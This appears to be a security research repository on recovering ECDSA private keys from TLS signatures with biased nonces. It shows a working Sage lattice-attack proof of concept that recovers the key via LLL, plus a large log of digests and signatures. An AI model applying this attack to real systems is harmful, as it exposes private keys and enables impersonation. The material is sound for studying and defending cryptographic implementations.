├── .gitignore ├── PoC ├── attack_clean.sage ├── attack_clean.sage.py └── nonces_155.log ├── README.md ├── datasets ├── 1000 │ ├── client.log │ └── server.log ├── 10000 │ ├── client.log │ └── server.log └── README.md ├── setup ├── client │ ├── README.md │ ├── attack.c │ ├── offline │ │ ├── README.md │ │ ├── download.sh │ │ └── lattice.sage │ └── run_client.sh └── server │ ├── README.md │ ├── create_objects.py │ ├── openssl_patch │ ├── #unpatch.patch# │ ├── README.md │ ├── README.md~ │ ├── store_nonces.patch │ ├── store_signatures.patch │ ├── store_truncated_digests.patch │ └── unpatch.patch │ ├── run_server.sh │ ├── server.key │ └── server.pem ├── slides.key ├── slides.pdf ├── tools ├── README.md ├── create_objects.py ├── get_data_by_bitlength.py ├── get_data_by_timing.py ├── get_small_nonces_data.py ├── test_nonces_quality.py └── test_timing_of_client.py ├── whitepaper.pdf └── whitepaper ├── ecdsa_rfc4492.png ├── fail.png ├── nice_web_plot.png ├── ps3.png ├── rfc5246.png ├── serverKeyExchange.png ├── serverside.png ├── serverside_scrambled.png └── whitepaper.tex /.gitignore: -------------------------------------------------------------------------------- 1 | #* 2 | *~ 3 | .* 4 | *# -------------------------------------------------------------------------------- /PoC/attack_clean.sage: -------------------------------------------------------------------------------- 1 | # Config 2 | lattice_size = 35 # number of signatures 3 | trick = 2^163 / 2^8 # 7 leading bits 4 | print trick 5 | 6 | # Get data 7 | with open("nonces_155.log", "r") as f: 8 | content = f.readlines() 9 | 10 | digests = [] 11 | signatures = [] 12 | 13 | # Parse it 14 | for item in content[:lattice_size]: 15 | data = item.strip("\n") 16 | data = data.split(" ") 17 | data = list(truc.strip("L") for truc in data) 18 | data = map(int, data) 19 | digests.append(data[1]) 20 | signatures.append((data[2], data[3])) 21 | 22 | # get public key x coordinate 23 | pubx = 
0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 24 | 25 | # and public key modulo 26 | # taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 27 | modulo = 5846006549323611672814742442876390689256843201587 28 | 29 | # Building Equations 30 | nn = len(digests) 31 | 32 | # getting rid of the first equation 33 | r0_inv = inverse_mod(signatures[0][0], modulo) 34 | s0 = signatures[0][1] 35 | m0 = digests[0] 36 | 37 | AA = [-1] 38 | BB = [0] 39 | 40 | for ii in range(1, nn): 41 | mm = digests[ii] 42 | rr = signatures[ii][0] 43 | ss = signatures[ii][1] 44 | ss_inv = inverse_mod(ss, modulo) 45 | 46 | AA_i = Mod(-1 * s0 * r0_inv * rr * ss_inv, modulo) 47 | BB_i = Mod(-1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 48 | AA.append(AA_i.lift()) 49 | BB.append(BB_i.lift()) 50 | 51 | # Embedding Technique (CVP->SVP) 52 | lattice = Matrix(ZZ, nn + 1) 53 | 54 | # Fill lattice 55 | for ii in range(nn): 56 | lattice[ii, ii] = modulo 57 | lattice[0, ii] = AA[ii] 58 | 59 | BB.append(trick) 60 | lattice[nn] = vector(BB) 61 | 62 | # LLL 63 | lattice = lattice.LLL() # should get better results with BKZ instead of LLL 64 | 65 | # If a solution is found, format it 66 | if lattice[0,-1] % modulo == trick: 67 | # get rid of (..., 1) 68 | vec = list(lattice[0]) 69 | vec.pop() 70 | vec = vector(vec) 71 | solution = -1 * vec 72 | 73 | # get d 74 | rr = signatures[0][0] 75 | ss = signatures[0][1] 76 | mm = digests[0] 77 | nonce = solution[0] 78 | 79 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 80 | 81 | print "found a key" 82 | print key 83 | -------------------------------------------------------------------------------- /PoC/attack_clean.sage.py: -------------------------------------------------------------------------------- 1 | # This file was *autogenerated* from the file attack_clean.sage 2 | from sage.all_cmdline import * # import sage library 3 | _sage_const_3 = Integer(3); _sage_const_2 = Integer(2); _sage_const_1 = Integer(1); 
_sage_const_0 = Integer(0); _sage_const_8 = Integer(8); _sage_const_163 = Integer(163); _sage_const_0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a = Integer(0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a); _sage_const_5846006549323611672814742442876390689256843201587 = Integer(5846006549323611672814742442876390689256843201587); _sage_const_35 = Integer(35)# Config 4 | lattice_size = _sage_const_35 # number of signatures 5 | trick = _sage_const_2 **_sage_const_163 / _sage_const_2 **_sage_const_8 # 7 leading bits 6 | print trick 7 | 8 | # Get data 9 | with open("nonces_155.log", "r") as f: 10 | content = f.readlines() 11 | 12 | digests = [] 13 | signatures = [] 14 | 15 | # Parse it 16 | for item in content[:lattice_size]: 17 | data = item.strip("\n") 18 | data = data.split(" ") 19 | data = list(truc.strip("L") for truc in data) 20 | data = map(int, data) 21 | digests.append(data[_sage_const_1 ]) 22 | signatures.append((data[_sage_const_2 ], data[_sage_const_3 ])) 23 | 24 | # get public key x coordinate 25 | pubx = _sage_const_0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 26 | 27 | # and public key modulo 28 | # taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 29 | modulo = _sage_const_5846006549323611672814742442876390689256843201587 30 | 31 | # Building Equations 32 | nn = len(digests) 33 | 34 | # getting rid of the first equation 35 | r0_inv = inverse_mod(signatures[_sage_const_0 ][_sage_const_0 ], modulo) 36 | s0 = signatures[_sage_const_0 ][_sage_const_1 ] 37 | m0 = digests[_sage_const_0 ] 38 | 39 | AA = [-_sage_const_1 ] 40 | BB = [_sage_const_0 ] 41 | 42 | for ii in range(_sage_const_1 , nn): 43 | mm = digests[ii] 44 | rr = signatures[ii][_sage_const_0 ] 45 | ss = signatures[ii][_sage_const_1 ] 46 | ss_inv = inverse_mod(ss, modulo) 47 | 48 | AA_i = Mod(-_sage_const_1 * s0 * r0_inv * rr * ss_inv, modulo) 49 | BB_i = Mod(-_sage_const_1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 50 | AA.append(AA_i.lift()) 51 | 
BB.append(BB_i.lift()) 52 | 53 | # Embedding Technique (CVP->SVP) 54 | lattice = Matrix(ZZ, nn + _sage_const_1 ) 55 | 56 | # Fill lattice 57 | for ii in range(nn): 58 | lattice[ii, ii] = modulo 59 | lattice[_sage_const_0 , ii] = AA[ii] 60 | 61 | BB.append(trick) 62 | lattice[nn] = vector(BB) 63 | 64 | # LLL 65 | lattice = lattice.LLL() # should get better results with BKZ instead of LLL 66 | 67 | # If a solution is found, format it 68 | if lattice[_sage_const_0 ,-_sage_const_1 ] % modulo == trick: 69 | # get rid of (..., 1) 70 | vec = list(lattice[_sage_const_0 ]) 71 | vec.pop() 72 | vec = vector(vec) 73 | solution = -_sage_const_1 * vec 74 | 75 | # get d 76 | rr = signatures[_sage_const_0 ][_sage_const_0 ] 77 | ss = signatures[_sage_const_0 ][_sage_const_1 ] 78 | mm = digests[_sage_const_0 ] 79 | nonce = solution[_sage_const_0 ] 80 | 81 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 82 | 83 | print "found a key" 84 | print key 85 | -------------------------------------------------------------------------------- /PoC/nonces_155.log: -------------------------------------------------------------------------------- 1 | 26308098502148470970204437468733256622013798296 5114477548029925335668554648256603454197624257542 5136855665956914524591727914998057900784695305423 5583257992397120517346272441926789879354254707292 2 | 35599329389388389557031066352331104897662856973 5628128194082114825796359607152367542766467615577 12552869362524749145427974597508494240658092710 2762747625566019917995978507973708768717349054693 3 | 26086855881117158758358821436067558388713985052 808185400194284930709213102777786486490233143211 3183255792216148572904537214262760088978793893092 1986866339961547604826967673272491575661579073536 4 | 31623506674859711834382087671569092798302301391 11159142129558634830422817923446376974299831797808 2080859131625261122260261040836728851380683719975 545638931506523552131422906290594722504099724302 5 | 
40004210399597655168405055604814027089454909225 2864058832436943807009822289957091360918920895016 277224144321026483394827244244131646602978812947 3815779422471669596594380013459522136423092302611 6 | 37650407252836009614547870513998872383232930796 2279893367210878366680977591460653225685053317861 936145966194860454864761788521899039979791361574 4923325964202875624115524168512332976353061199276 7 | 23230489844635431121180615822571527373450267913 148556136806108747374651856720514884625451242160 4665499042146410517976220212170729217750134589390 1549048592478331306660835386999840325000232179138 8 | 28971589905297675853555731319830134133086865660 9642018920752779153603596124105409626547093045810 5642294166082249624488491858914602284417689659502 1338950125873195060566686214486391858295376210371 9 | 24988588457519732962394398264084449442050097753 8563472575336251244429567754446150621713066907115 1320349695434484293813623802340093753767323726773 3175176160239056757729413796578884535948118495536 10 | 43357853008748850850854671888682204026038596529 525238159838437216379353698617570622075517424885 4154302561710546481533673303216980264852352719991 916886384797798632661854835732246351617225771214 11 | 39483288468765321506939638228493323354452259718 7937142721473004609004627527768961732952351682425 1446386249943365439292876763392011881025816657681 3438458085407772582305166897920279834241526898582 12 | 35820903756410729395696254153229074994592931765 1765508516298099256172515187358259883538207305719 1618959063858448774609138410941083962081130000712 5438668374089155520375246458290296686424667141678 13 | 23292858492205892358561219804374342862370306305 7659036284727286923692452100639646136883310037358 3347546988660439052519338014125454225811532366743 2978512194152582661314051173281280823416751256069 14 | 34754954858445700710918119842337689187741312935 577361767682474123709888286778699529719297084445 4736488754774365082537134868120651224242796781144 
2419786473002598293144630236158948054630882544305 15 | 33066157528432089414110510465895039565166316176 860648935412810369846585698961159543923001737877 4838234900644332967642627068198738241072417782775 5507127555910302150187775443417988341158351507672 16 | 32072102336032415303631047852953150345519743572 660225023904400696193587490532028522622032620953 5333808766428123045764491008655749274230314788517 1260853523788878223565196433250099252454380295560 17 | 28030732524567250016613624023372989728551008604 2223325030139568094737947326689252766755012874170 1092116605651587225906150509888491238951493788167 3624585979750721296459071237870899240183340436981 18 | 24619323691492258409686212878706791540627407334 5108301830397589549925920544539764145525348661519 208340256679949443808299438588098312703188741369 5135940780807702969554392721817992984451647219638 19 | 43568610430352103136660180854150664117342956696 5389191005222400726553414925523435369350068438990 3095033579288993290802000773661665713516638417868 5134130512391906285413765284290309213660175543849 20 | 26091913807563440726277322008245728250815559143 8621738325220430254614931372070507688422230561816 2680310442966354267620438748757514439555252101961 5188410531477125005874644926466541440430797571436 21 | 26298947639969080772875275705604400145285530019 6372514023800557511547086679621467828660701967954 5490442742992025954805791225464226790695280236031 499654336012817490651275803364675994104946894719 22 | 28063882931648282904632022111233072233258909722 10437119354731590260282493133190042954201375161934 4265447802265414840297278426023177460735930226266 5561370392758770349406500856327420276955206332538 23 | 33849846867823387567704427405274480262105912853 6727396728847380817095249780751481994337629268158 5635963605326638636633732491867340315370268557404 3325686467356991863500862729484933895330241995210 24 | 31554161993592425823077874240982519909076355766 4310031358397390640257213063277082295141375391334 
2757241329803159348764218996512260890211748848280 2540201342048049682835652666817259064767975249402 25 | 34612553285980651148947391656863320874071452073 3931423039099640139211548672550436256155742917317 3405620209986431366712431815398890971950308862614 499737770290349539814980308185158252077528754733 26 | 38383864706624283441520136631361329915990069301 4437257868017172655052546283057773131632250575187 1821922727678518445971843297926452259676698991357 3227928773297941467613244201262867346393322719559 27 | 35132379351790961150661533160195044359221843588 1318410964888715112320314720669244087469770125996 1928321389603275444082368115082530586454895595768 1051345222830438621438436837890000507314079956916 28 | 25272379699478957139803242528775302942933676621 11664158112592982752374462384515476270988408634767 423406880742198641513409545395511731441975059642 113799619034165665202064929798729127425660227634 29 | 36586041748883064248200782063609032573020532238 10660702282078848173051599219857374020149746774880 4883906846395104081242622695791608012917423394574 2133937213420933316624908039168853896866955191139 30 | 26619551838136442873178156192229421995795744263 10267026151584731630189471527269182245760784295445 5242845928249101042704345159358184144380854982058 3880361218745352171580268976165492274244895134184 31 | 31130088620754321455838403284074611659394239270 3509063185497598262251085558638165888504012862753 1163649829854898750526171697991267817400749954949 3451626335078530466913099919622218479347682854569 32 | 27821160395681379633592859882446636143016653923 10474870094888746364424009573569162911555229908574 4269098909262630765059257769901165519228559222337 2889671405098070529853019416062135551805060939578 33 | 25204198980481731154942776371339619346914638675 8699724659974740767092174206379150113963649391872 3113139516159980702342948599055453837114346966339 5295939353682424223869509228353806627059252053700 34 | 40918909008898549123301410326848727803363514315 
5841548438614561419770124913854968800896055546281 5570067388849686860839601678098881323397511514359 5370596402513227123537875214137424350554129864330 35 | 30899025767029566350344588654375900874731162664 10028872307936774727383320293380978241685389052619 3840954080435003739834655520092463921136429192426 964664843689181738184168919297306706647677471351 36 | 42417408614950052517812549202288531179963532923 5630826583911685897831679403858345540957317394760 225892205740250274893579938338396638298407164535 2355626930593887524225976517579339401378421942290 37 | 42004014347605460569081853054481495547512251978 6500588393542157849686287050235987543132039142180 5779329059072632000252504176637370971932686032911 3079880533428355714417157349298109194566915537364 38 | 33184386883488435847389542028170721655348290716 2456635939301807410335927526650209485532846756127 3319549665677709395710726129280782453739684261325 4641355529186332392854191578522538228415598302018 39 | 26162165789225475999455892327396925769616854938 2098394041305332730152666001432554445534216099080 4084699516272452428273596161037161402920396714529 3773608941815900228950929472276126922246634519829 40 | 24226013184012083384835084178239797464954920025 9697034774697824455345199808075030019162085835693 2449862099110239394186275831292897260895329642423 5018965050017045985959365025137527071606498852652 41 | 43908508599354285875116189644617725627498767818 3846238988872327919847059795273696203420289899 1962028840265890840149377322664632357343104936815 2437303982587497742155071176186983812198464988195 42 | 39744448008246824102686068027134149073373217353 387687668198309979858495793903025111702603294392 2877109641504010902932179217890872759831334502630 3020448534947330393482637662684015335393215829063 43 | 37673971869211776386991084147598116830250699744 5469466882401331421461596085934527048827644922419 3945373800504651015591166904349173662574208129001 3193809108420593625817844926007195957991742222553 44 | 
45193061764570062829451577903161660209166527994 9798969314930869290822930875631152802632050007803 5535509526427872448603698665523766870204070860902 2745755632722391185008063417012032779324150877995 45 | 37056836289087829489790137652788251603275387099 7815867555091257579534753842211946968979674393701 1806734077448470510658161903002908949132923261137 9784574019613990422590106129545882668709828906 46 | 39296051381240984768519190922155170522290227440 5157429993544109686382655852089051911623446730203 5049422116257276196807899137308075695924548843252 4842083818524338120390245545778256072989617366887 47 | 25457192122978592636400261589598794732596783317 4808852701549305971924297354179857048849415002885 1883046959941484977811720447463048947944538161756 3411491889487148246372441944220449788807735965632 48 | 42912232206658205121007084638810227583564311052 10585947962404684116851898457894042233512495740069 5753992721495892479367107323323639317976224743543 4413823121598159850780253293242476715724916141464 49 | 26638523301654021323676674860810570538198078781 2343013003617086677786659534287953445434915422047 1774196974398441740506093287584087456367970751828 472298370337968098219925288221081717345022321483 50 | 28304411013251021802366707726109555186060197748 4223969380765106875239762513649261683617184558257 370321362424002355336575387538265638337609454801 3155987860607736198725655369676615798978416679897 51 | 43369918854388827523762568406310677394574301556 11442575744097376564425456910574965383525591010291 3749106817124352104531395969122833471793929149883 5835763673825216899763585694961499171875917916309 52 | 34323257009466743805847885819218927695110191499 10412394532754732405138203989927480306427292479246 1802131498536938341926102109699374025224350575148 5281919117262432773694681800682061868589912662085 53 | 28289778753611371316386422868597392212781296136 3251581087124567450845121940129466079683667251882 1437009925836721874478399665209651509363352088150 
5576926154493270461365170689106395256119570649562 54 | 30468187038147643753059455069300575758101215402 3631770871155721664086872422044593625217458363400 4261861531224411962048828283455945262197984009446 4969388087814202432644207950316042535852938307283 55 | 35666086869986028788001627571083706007504653535 9969565743302055098266669672903865244296083300613 1924349008280796300003213800705402435236039723283 30304203225925181584950015540041682617193390261 56 | 33275930483773904892060046555161008004481821684 3819284549668909686561000511536475636010470847568 2880522615076086572513879675417352882821984244157 1582200775152975795210470102563716569529817749498 57 | 28335260761991433540380474371877106059579543106 10617508332853646834530277458972686958627435428475 4006729990940678908159875657245313546625102034434 4446775369774513432199392226376811652098822321697 58 | 42684623318382210975013222862791226170028266019 1446496000113134407889432797091779055977063565876 2784539602220015390889133570202165984845581501682 1323991208243502958316694608371257788498254353485 59 | 42429646312855957295869029238628331670173064099 11328784435132151940884198696625806881778646236333 3594512287783132646056924227988706894135925993316 952611922288628437409603649577563438259836658774 60 | 38800449641693929258268391209462382404556435680 992174624001610672609067725556739261686154755323 5550722001361874143821328260397410722370179288309 1408829677614260677886410252047897866950105638684 61 | 37774854785693227654586283185296061292171445754 6094540750978080634928669605331437465581145096111 579141183683197221853965894465780395981211544753 4473556730345237974037393112401697516414692729070 62 | 39919459660825817136989072589219806637201647289 3265520127833307488614640144540278133060905235579 4132160396047419933517994810721211551754246929607 1093544658922986559730845278818456609242108520818 63 | 38203074549860818710632141419962565227429393619 5819067323940150772686287021767577928933160631500 
1350894106673096743997381823741083363093515255142 2607612845449060218942999543955270183252239069748 64 | 29960093773836408858826378343122271006762323066 2106168782538081100257539609139522280100180986796 2661701295897640220531934274799967242758089387583 4925251420284341024514865814197702137156264231126 65 | 23467183739671985687856493748547795321595173257 3367894080361962449672008988500620044846624645772 3902427398211540344217063507454054224040740298175 2193689004329746063444377548241391566678820141301 66 | 28769859486357546090241122237058620872114924268 4182522819930533844977884769485070733847410780599 4525958360077749161829674410982821148488389064805 644909759871731352288884078772231813626973428954 67 | 23671099257425469560698554258170710765281107925 3965911375469632685692109228031837365685624820816 5832225992017027980231537964537081154613350294772 1370837319595621575378317113534077239362582374546 68 | 44737053986025216466096079939303997797249452433 3216317580374806327041701930397121444666857464270 1787145103655940659346689885756038652058587503020 2538426617596675885927383895430810113179875390607 69 | 35379539849526631511019611157109464810787717937 10146373032064330436712214041714776674686279764027 2059666516745254088372070134748070146895905733538 2186055212125405872525553500656700809277860396582 70 | 24793689042147526986349604130777869459085340937 6213618790557986027363288657140321991002239978130 3510785257324289000009971178888924450106904910193 244742627524765581786461043512442921458264977602 71 | 25236810056255930443700842109723214552981096424 871251985038594982394444716847087880779863517163 4265115129680006223222190070008301359514722556250 2812196661121581571502110545776050971440610648891 72 | 33285536316402418569769662222912685280840537996 6659467434071897117516411647378663372852491512328 5178675727334457262712018910231014838047958953326 4263972659432506325642195566946929086113865636472 73 | 25180485650236561331785715324423496728672588236 
11585096324050504689350223149232007912355617266889 4364572658602431041626284741515947090581356375936 4328190158975308462055647904574059515869822123907 74 | 25234497246120178027257156279634584245379551287 621087657541459274861466741686869050986499621948 2398572577775037400639727926279300495617526675582 2343366693182954406429452016259592472631020324127 75 | 42594506140057976943670764532877101231864436290 4121590512783104718945787886402330473390433192292 2528420126819838153415668634913535813843429841603 2167558009893849441603935403547104159672191991077 76 | 26913835251660647805344104454640292801170074726 6538996326599200713763694729091805324483008799116 2115387290093509308118437285524663439999588256485 2175415273431973835960623798470912964642079629234 77 | 36926293053423846909752765425993217439355156420 1446834674294310032367754757997865531491653415433 4875454863395076282579090974838400245529357575613 2265763950228288858378819897669314505780522086194 78 | 27424721167906022347572819335136229313705046833 4008387418418708535560552029783429582581589822803 5828553647133478257691082182542971578196535762623 4055206447587347833093090429761058174327216132204 79 | 31146249187813001151402375083802517073769894978 11255455349663238899918808368052126544904301048286 3806803837677000075001121589113510379157971470246 489696178382854950255503835022189071199023498439 80 | 28550939638725095023594006634905631169936389249 5567194053779089888381904417752882113912193154023 1258364708946378172930694495638020790725852467727 5447658549957505144172015066304257741426857209468 81 | 34209878766018922193802999712360995835841037597 9805085094347412443339421312081292417695999481191 1500200323118557380425888630203213694177767676701 263052408677966455332359699400951684285033503611 82 | 43409913807872038450050982116361480140907984557 9014784365051685051772251659675764477329457303007 3216990512799527705133567377412813573315199049439 5238671715830747620198405732647266361307227979378 83 | 
23730502413804800944046593365880903645076754029 3018192074662405603912700415078841791183683980692 5250204026846111870967611611602560470691896868483 436726725674937708737257954782779437905791849831 84 | 40658965215501458307616305364286742190220552107 9024851306918487119805467063234153374632744418143 4729066721081097070798996202920980853089205410576 2714921765390420440395925083110294517619109063442 85 | 24454949320031331194250930202870878058513241218 8009747695777039151671599568606191156585331106720 2435875691735999494569736186662279216940796868687 4669290555023475016954140516603742596911975258927 86 | 38751780183323931139352711447661718625281334533 947571331598550849544779614515159788508169640784 475943630440712913272612073629288426143410959551 2284549599735551948347826149465491170508899851937 87 | 40925376681080060682187948234781012057230225480 1827298904921764673056179246590757269758419355118 2950394692398447674427034091099011606378525039127 3356182175945069368713336860452288813861485202069 88 | 33623092823134840975923008785462742628011240090 9423931505518084530729114905897460585675763602904 452324795308946984153547858190050180253496527624 5389700990534973129699667145056503606510369957546 89 | 38836706190576245119532981351801290719241884464 3785631869168770083425521725832376704722967892322 1768601107482255905645540070091614059887472537420 1166112136165304891147950008140907323999703126563 90 | 30662719944562086163973523131886452994410839696 10911885707881799141566506219478190623850026712301 2885319267352580326989489062498267041721951638398 5662330131773766486213259978358391732819524232969 91 | 40869517228828309348546980357008187409057133136 3186886182389280686422107506371132588565447404132 1146815165366865428833554525729004995109768993964 4915449023261625062342627400256434942706474169811 92 | 44138436829260618105893126997737532542666348758 5693194030296880186824373756060409685003021877672 903763213920934087643983244499219090387207174037 
5334289102829399663465518580458695086272130185817 93 | 28841085557507883472660213578097041895286488885 2423509191747292358000491757766135052770398521698 3633612815088481647026729719188584695365805947854 1924633351305129721498112905376561778827263255229 94 | 28442097436649061095324608128415531928657241704 9089642211411068496457897341695229214244033205951 3373709375031002609860155442771816571535445763243 2733381200506810382001394823636202379242747875471 95 | 32347993056438138288170335804767427366635567147 1118284879888934740425092686809449589197593141271 5723833358825895810407914029969626478317915650746 234161052523397207605419101508941179324329438410 96 | 44408339879257196630074638317379051361544213333 8905004088365449113893519950589547864689475868053 5821609014133902841454092921304965938972598186723 1996500250854106468168593951244430379901180762726 97 | 30914471727343109452048340999229552378195345904 6931543832144587423234197339627151037016169997732 4303849947942784683411369822614265387004648411797 2534809865162646498589274194418466469548007280480 98 | 39580513200590965476104329522784678660751875578 692147269161411573293638777938253253737718858048 1311726587433158417945937689824177965516088132537 4717589980154125912916180232359172041618124297469 99 | 31242205008465259560498463901315573692780072498 96156081835900325036314283998261813419639413828 4130630235786565762544235305461728126496295168493 4672519155172004765266288615663519364356399440855 100 | 35324705091954839057071053221792225023983046253 2277022069854995464092281169056903383119813270140 3845855772493894683734876017320303566229667156510 220335531365980134340157253793245340184739964456 101 | 23699877547627578301659860352896185360896325578 6367648249394308298262608845293895233129603498988 640493889237702062806710063064906962914283405549 1572792955520312717644525283538599635254432860233 102 | 27106589632892246490499811895453536795081108639 3543684001392270276759394070964676282662422647568 
3005277337986612771870499499821255545632572089903 2713604831334165728123412356187805994646791062605 103 | 42592064199710044776158988877437635439191268797 8772103072674753110339730576215335765818242567120 581689507790951186402676336265679916418064483955 3046793868070234660339902916218394194411531439244 104 | 40171216979730374544007710531161375928748156819 4339136985816148813554926407414976373686207423158 2384228036674703275577105011827577594888136864288 3419817170165750333449240702287711794816944283533 105 | 33317955777421131451202925775286874016612313277 3159905004188180544040801976138791441859895497141 2976328118345489375459056322617250914473084016366 3083046843967535007668506960444010683686825370459 106 | 39748828577533661738801004338029381183879022487 9542787757474338776672601444519773022992314087481 1758073990422120202824123682094195697315500718639 5822191032872248731594272015945837434630542494468 107 | 35627554897953780699096633087088701907885754547 4500332679545281023210005911976708287685110057179 3359212105054281535480025992342878959485817113369 5324989658743138628713174730125785041948679098388 108 | 25866221969078953658250567539147417654556065641 4568664301926680474953941362317444328934793010500 118461251180233409521538539175787862538597551145 2715244921099703405173291021194468379168889246258 109 | 25028496604090948497221966143188831645910959401 2171239934063455386804864887449971773107392156486 2354489038947152458080549288973915464988811596272 3839364772063137710627992107414767901675212261453 110 | 27691173027324148823646595936590860835459945808 1621692600465042656020473117652404725476912722233 3141080600293669356526043476877599059463417810857 1923717206439318676831552072096058806283349027856 111 | 44162365462353156921401195786967909998572139450 5337832206121186962750418116450843423789950783234 4057588898848135985638760221708398961012646570106 1126070986433334038182384937941195804379520104512 112 | 26548421994672192968284824393086465821812843280 
524117176735835634897581746303810366239566121790 3940972013270953285320984212120650382818474947190 5271808648224282788569211220350143822972904838400 113 | 42883503829058964686968445002694081034846558723 4178190737746163023302670335516700918649920326311 5476069850865022508557612784899116545954984289181 1867066206734490525750847075291531500434097997717 114 | 25302167678652636510018393468809135232226945656 1868903504530846983556903430078350362114402374893 1180603936245507463824685141176686357722769548005 2065875272326649783770111599447689076475911935981 115 | 35164214224066881978497279146963808681812747726 7154608745340331079223345284330016327159741932709 5225704369781749115658116897368920797771083625697 3318662029312971640322277341312543851421331565690 116 | 42163550050287062674935134290049107716452355481 1741046644170787361767957617126453727546830038237 1325536862461507252425400537968538528798639356210 5833898485752674817167480334107878900307310712147 117 | 29060186612885557792084129042483727644074633396 11396010832376234341912687044073327480768393196056 2326070388572445757518396485224110214091015237482 4045466405766851471924294053319336137425248852734 118 | 42515569781095621601567372650971006853474811578 3897469398325891417986437537252769647922803646242 2134236966261194662483439275886533615611664626957 780363550775266558579854359770528157111107563000 119 | 31815805567865422990144139854087759855466083308 921373641816393589486479444568378860085323696308 4569256000921558845076030975215172481864875357024 2157722388776003817456377145481106076866667420997 120 | 31831116821893364264942868699832104427763039715 584584775042918643077285900077917289267756440230 3153148921859383821484567830469386763868990607675 3802501295196092675990868407906370453593086527943 121 | 29281303922565829021742326016216108211577167600 8817657564936027751315944871977059003011965107073 3693924035511756467206321822157371160801720911182 5749462376254247290310436449081102154330684944675 122 | 
30628291833592442595008114069729501977016758173 4157634483563966114697321457652272375804769486149 5655994510924016048130701784453050118144047421694 3741795312532311431155123752827795703063463833817 123 | 29284853816492446804413469171935413444461451492 5664221639121674410937744839397349712647737177640 3137995581895602334239951945900607147856009274382 4798702098170225049514702177277435360185262770258 124 | 34816666863323376129124744748820296968464726067 1069492425245754595587030706810748045292729002269 2529556976420325951869431272006883814894973695249 593461412953415536488081152697133934566669338899 125 | 34629580681015900937117600564598573109310921957 5063603632846785789897698997847476205343002825505 5074657064385740662311118044138062227397356999060 1019363292170889555109806357787377732940361952044 126 | 31968167450280102416468182207419563119813907631 1003646543995328497745451521155975382658378797827 3456766096265174946345949572686109869691474803371 1172272616529113840716406761374104653643711004317 127 | 40811701877355401236547786806328392415431590715 11299614043003427593771000153608075992748648729050 1260634987446391785459200777359705199810267732882 5260560549833126497405175942026414181837381379124 128 | 30525641021897218613094724295778626845730751641 3853494446976789702611568216501001917738956407586 4245498212123850982807258251168913425114115649405 2958278706692289403981854507895778718355855161456 129 | 44822439788996492269730254201288564148493746744 1599448486242270759808329138964687855194515874585 963455086392093150115012869739501136231777640288 4189601573176584956070877790683588813412285083148 130 | 44978352916330561811801116123957072511602904988 9198934903722198351040973867900032211297728565613 4674071342722005136364720048250400096858621774677 2568826753754958480114433967695116720490377840697 131 | 28126378065265516580907044420983758583080281081 8033303631112725829558494947436141623972860824235 2077414665085903961077843538028873803308283679757 
2186434101815411904861766100494513007089634628951 132 | 30145362666104423189062432509441989337864322091 1804100145599219176443833571187613963153793438368 1886217477037171597143070700494269593806213940135 4094359036900846085123149550729355028906979580241 133 | 40110161190366815030239319078401807055777927246 5378426795457686622315268196778666821669367719219 1046964927481797463201665153502281483138225801293 4818787318318607895367916323192129755693720132687 134 | 30152522010635611724874062550614627210177832378 4815522824562078866571073201507802647617009165300 2399146313214284592317504891723107198035940097306 1229629185335363149639555593823006472866036543349 135 | 42198940952235025537084209409400741718205511432 4060816472619032750739407914988239623350525545661 3049433948326336937580443127724625255386887371222 733273027483017310740855592303508928288873319127 136 | 45172615993140387018899668633583383407306377622 8550939737948086113123802401619067718308704091993 2319762788968398056493284116393355905421877087412 5641648012988949799924439413520047236667606464761 137 | 30979815440421289238500125930875291095275122407 1063793535411478687170735597154964629562791547036 2250737175461300890273868522467762245837677639632 2844235237298358738475691835414070880379585886781 138 | 38473618911888573940966775142333230684967234499 6348654043014970610154649945652489796143581818126 1593846878902018578030839900552706231555006067814 939694777019135261880218707600882584283331123719 139 | 36873746883763517107167893861087683093439691061 5779927834294876089694233373301592916290258291952 3822623085296386860182314391220211423305960584110 5097374250240908873289871393014933425359363735718 140 | 25375190685113145333491551925024789150979574358 11294960194540241721802270798494494329198487847530 1615629266724422657379759004967895915350092598758 5226684002694759792999360486216303036216044511362 141 | 29437256609987797228975435348054283182966853976 11235529182135731828047699333517848442848172425807 
4853347778340787566745741262233250651132249127914 4231372146194964684355336962565065766404215948922 142 | 42809608975643606018033442364604538254034870381 4059997677120017321165148962225246696662413680827 606618755797813771907984198159693382381350094056 4510260899214139897038038885291709580278685969759 143 | 30474082684490223753912717979118097944693248996 11418454466208335024521823970496332762364402269468 2226181825765434325398532566003974311179332689253 2668766973664155884895089746337804031055602121903 144 | 41146389555014517904634452408603484207340308108 3599752473179588388084520906052693967165552147754 3377984591400812906584624278715647148051951645086 112746761081890266588203354033273702146615680958 145 | 36763281489625171887764428024316756359166735904 11396510737358959281952184047163451034758342751275 4193142630306338681579648115331632510924751273775 3503189360893392245015190936197429945033471900197 146 | 38384742679399290956295034322640482794383631943 8051637710226330512642186234598521581221635973142 347019350055029789609204739608529521917287071523 1961830231785879260526073080138313805287202386362 147 | 37460480779408356107522903414938143001232984624 10911894710065440495819056917372037469880692432976 5329469978868353434218955058804326629210256238081 4504103477413324206650641982248177750561816950637 148 | 25294686594154763602466875396819718923088039585 1335183268255036162114363531755211759992571782848 2336333136155762731055707106411154622210165867397 1204391987773333096951852161391639952137841321785 149 | 40895376588214355187933972101567903580375159112 7279560777438489217885548469076130237075144218138 2404087934572556035363111728109728317735567716621 506408872014562945090087688986810313166517091625 150 | 43129933845325173501141539992464904832822856983 6462204998911591897964066736278863495361428276373 839658091593448400986152606189948539084781875196 3860020511423323752469098619888089458185962308225 151 | 30556075420502983441033776596177814733165101731 
